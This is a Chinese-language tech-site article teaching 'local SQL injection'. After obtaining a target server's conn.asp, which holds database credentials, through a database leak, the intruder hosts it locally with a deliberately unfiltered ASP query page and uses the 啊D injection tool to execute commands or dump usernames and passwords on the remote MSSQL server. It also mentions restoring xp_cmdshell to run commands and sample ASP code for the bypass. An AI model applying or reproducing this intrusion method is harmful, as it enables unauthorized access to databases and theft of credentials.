当前位置: 移动技术网 > IT编程>数据库>其他数据库 > 本地SQL注射攻略分析曝光

本地SQL注射攻略分析曝光

2017年12月08日  | 移动技术网IT编程  | 我要评论
何为本地注射?简单地讲,就是本来你在服务器上无法进行sql注入,因为服务器上的web程序很安全,对request("id")这样的请求过滤很严,或是限制输入格式为数字等等方

何为本地注射?简单地讲,就是本来你在服务器上无法进行sql注入,因为服务器上的web程序很安全,对request("id")这样的请求过滤很严,或是限制输入格式为数字等等方法,你只能选择放弃放弃注入。

但是在有的时候,你可以在本机的iis里进行注入,从而达到对服务器注射的目的,避过服务器的request参数提交过滤。举例子来说明吧,现在你误打误撞,利用暴库或是其他的漏洞,得到了服务器的conn.asp文件,那么恭喜你,入侵离成功不远了。

conn.asp文件代码一般如下:

<%
set conn = server.createobject("adodb.connection")
conn.open "provider=sqloledb;data source=61.121.140.37;uid=admin;pwd=12345;database=master"
%>

这里面记录的就是服务器的数据库的一些信息了,一般也会得到连接密码,说明是mssql的系统,非常好搞。如果服务器有url可以进行sql语句注射的话,恢复下xp_cmdshell,我们就能执行很多命令了,dos命令也随便你。但是很可惜,我们不能注射,只有这么一个conn.asp文件可以利用。

那么,我们在本机来欺骗服务器,不过你要知道那个服务器采用的是什么web程序,不然你下面就不好写代码,我们来写一个sqltest.asp文件,在其中不做任何过滤,将这个文件和conn.asp一起放到你的iis中的wwwroot下面,这样你就能通过localhost来访问啦。

sqltest.asp代码如下:

<!--#include file="conn.asp"-->
<%
dim rs,strsql,id
set rs=server.createobject("adodb.recordset")
id = request("id")
strsql ="select * from dvbbsmdb where guestid=" & id
rs.open strsql,conn,1,3
rs.close
%>

那个dvbbsmdb是我虚构的,大家要改成这个web程序的数据库的库名。看到没有,id的提交参数没有经过任何的过滤,没有用replace或是其他的函数。现在我们在啊d中输入注射url:http://localhost/sqltest.asp?id=1。接着用啊d在本地服务器执行命令或是跑用户名和密码,就等同于在你要入侵的服务器上进行注射,绕过了它的防注入措施。

这就是本地欺骗注射,明白了吧?

如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!

相关文章:

验证码:
移动技术网